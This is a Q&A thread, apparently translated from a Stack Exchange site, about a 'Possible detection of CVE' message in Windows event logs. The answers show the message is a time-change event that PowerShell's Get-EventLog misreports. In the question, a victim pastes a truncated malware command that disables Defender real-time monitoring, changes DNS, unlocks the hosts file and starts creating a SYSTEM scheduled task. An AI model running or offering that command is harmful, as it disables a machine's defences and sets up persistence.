从 Windows 事件日志来看,漏洞是否被阻止了?我可以从事件日志中获取 CVE 编号,以便知道具体的 KB 编号吗?
39536 Apr 13 08:31 Information Microsoft-Windows-Kernel-General
1 Possible detection of CVE: 2020-04-13T01:31:16.580703600Z
Additional Information: 2020-04-13T01:31:16.580796000Z
This Event is generated when an attempt to exploit a known vulnerability 2020-04-13T01:31:16.580703600Z) is detected.
This Event is raised by a User mode process.
我还得到了这个恶意软件日志
Apr 13 08:29 Information Service Control Manager 1073748869 A service was installed in the system.
Service Name: SYYHQSMMFDSEFEVOTKNH
Service File Name: %COMSPEC% /C "cmd /c powershell -c
Set-MpPreference -DisableRealtimeMonitoring $true;(get-wmiobject -class win32_networkadapterconfiguration -filter ipenabled=true).
SetDNSServerSearchOrder(@('8.8.8.8','9.9.9.9'))&powershell -c attrib -R C:\WINDOWS\system32\drivers\etc\hosts;$rh=-join([char[]](Get-Random -Count (6+(Get-Random)%6)(65..90+97..122)));$cmd='schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa1 /F /tr \"powershell -c ''*awcna*
我已经用 MS 17-010 修补了机器,但从日志中找不到成功登录。太令人困惑了。
答案1
我刚刚在 Microsoft 论坛问题上发布了此问题,并想在这里分享(我更喜欢 SE 而不是 MS 论坛 :-P)
我也遇到了这个问题。当我尝试获取更多信息时,我注意到的一件事是,PowerShell 报告的内容与事件查看器 GUI 报告的内容之间似乎存在差异。对于事件 1 类别 5,我得到:
- PowerShell:可能检测到 CVE:,其他信息:。检测到试图利用已知漏洞 () 时会生成此事件。此事件由用户模式进程引发。
- GUI:系统时间已从 更改为
存在关联事件 24 类别 11,显示:
PowerShell:无法找到源“Microsoft-Windows-Kernel-General”中事件 ID“24”的描述。本地计算机可能没有显示该消息所需的注册表信息或消息 DLL 文件,或者您可能没有访问它们的权限。以下信息是该事件的一部分:
GUI:时区信息已刷新,退出原因为 。当前时区偏差为 。
根据传递的数据,我认为 GUI 是正确的(时间调整),而 PowerShell 得到的事件描述(CVE 检测)是错误的。第一个事件传递的日期时间看起来像是日期时间之前和之后,第二个事件的第二个参数是 -600,我认为这与我所在的时区相关(AEST、GMT+10,因此调整了 600 分钟)。
答案2
稍微扩展一下 @DarkMoon 的回答,我在 PowerShell 的Get-EventLog
输出中看到了相同的“可能检测到 CVE”消息文本。对于该事件,来自的消息文本Get-EventLog
与至少三种查询 Windows 事件日志的其他方法不一致:
- 窗口的事件查看器 GUI。
- PowerShell 的
Get-WinEvent
。 - Windows 的
wevtutl
命令行实用程序。
所有这些方法的消息文本都以“系统时间已更改为”开头。此外,我的系统上的 PID 4 指的是系统进程,它可能无法避免被黑客入侵,但与其他一些进程相比,这种可能性似乎较小。我认为所有这些额外的证据表明 PowerShellGet-EventLog
未报告正确的消息文本。请参阅以下示例:
wevtutil
PS C:\> wevtutil qe System /rd:true /c:10 /f:text
...
Event[6]:
Log Name: System
Source: Microsoft-Windows-Kernel-General
Date: 2023-03-09T08:41:45.5000000Z
Event ID: 1
Task: N/A
Level: Information
Opcode: Info
Keyword: Time
User: N/A
User Name: N/A
Computer: atacama
Description:
The system time has changed to 2023-03-09T13:41:45.500000000Z from 2023-03-09T04:12:41.415750200Z.
Change Reason: System time synchronized with the hardware clock.
Process: '' (PID 4).
...
Get-WinEvent
PS C:\> Get-WinEvent -MaxEvents 1 -FilterHashtable @{ LogName = 'System'; Id = 1; ProviderName = 'Microsoft-Windows-Kernel-General' } | Format-List
TimeCreated : 3/9/2023 8:41:45 AM
ProviderName : Microsoft-Windows-Kernel-General
Id : 1
Message : The system time has changed to
2023-03-09T13:41:45.500000000Z from
2023-03-09T04:12:41.415750200Z.
Change Reason: System time synchronized with the hardware clock.
Process: '' (PID 4).
Get-EventLog
PS C:\> Get-EventLog System -Source Microsoft-Windows-Kernel-General -InstanceId 1 -Newest 1 | Format-List
Index : 97462
EntryType : Information
InstanceId : 1
Message : Possible detection of CVE: 2023-03-09T13:41:45.5000000Z
Additional Information: 2023-03-09T04:12:41.4157502Z
This Event is generated when an attempt to exploit a
known vulnerability (2023-03-09T13:41:45.5000000Z) is
detected.
This Event is raised by a User mode process.
Category : (5)
CategoryNumber : 5
ReplacementStrings : {2023-03-09T13:41:45.5000000Z,
2023-03-09T04:12:41.4157502Z, 2, ...}
Source : Microsoft-Windows-Kernel-General
TimeGenerated : 3/9/2023 8:41:45 AM
TimeWritten : 3/9/2023 8:41:45 AM
UserName :